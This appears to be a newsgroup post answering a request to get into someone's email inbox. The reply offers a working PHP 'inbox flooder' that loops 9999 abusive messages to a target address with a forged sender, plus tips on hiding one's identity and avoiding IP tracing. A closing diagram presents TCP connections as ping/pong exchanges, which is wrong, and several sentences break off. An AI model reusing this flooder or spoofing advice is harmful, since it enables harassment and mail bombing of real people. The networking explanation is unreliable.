Post by FaiNtI know it's unlegal and pretty unpolite but I'm really interested in
someone's mail inbox, so do you know how to open it but without knowing his
It's as simple as faking your identify on this news group. At the
beginning of my software configuration it asked me for a name and email,
if I entered in false information, it would still work.
It is more difficult to achieve it if you rely on a remote SMTP server,
but it is not impossible. It is best to simply down or execute your
local SMTP, and use a programming language that already knows the SMTP
For an example, I use this as a inbox flooder:
$MailToAddress = "***";
$MailSubject = "Fuck Off!";
$email = "***";
$Message = "Go Away!";
for ($i = 1; $i <= 9999; $i++) {
mail($MailToAddress, $MailSubject, $Message, "Content-Type:
text/html; charset=ISO-8859-1\r\nFrom: ".$email."\r\nBCc: ".$MailToCC);
echo '<pre>Sent message ' . $i . ' successfully!</pre>' . "\n";
That creates a loop, and uses the varibles at the beginning to
administer the email to the user. And simply uses the function email to
connect, and instructs the local mail/smtp demon to send the email.
Most often, you can use it to mask who you are, but don't entrust all
your security to it!!
If say you were to send a formal email to bill gates, cough, don't trust
they don't log packets or service requests, cause they will trace the ip
it was sent from.
TCP Rules:
Random Socket connect to email server
Computer 1 -------------------------------------> Computer 2
Ping connection, verify connection exists
Computer 1 <------------------------------------- Computer 2
Verifys the ping, responding a pong.
Computer 1 -------------------------------------> Computer 2
Connection is open!
Sends Data (Email)
Computer 1 -------------------------------------> Computer 2
Validates email sent...
Computer 1 <------------------------------------- Computer 2
Connetion lost by remote host.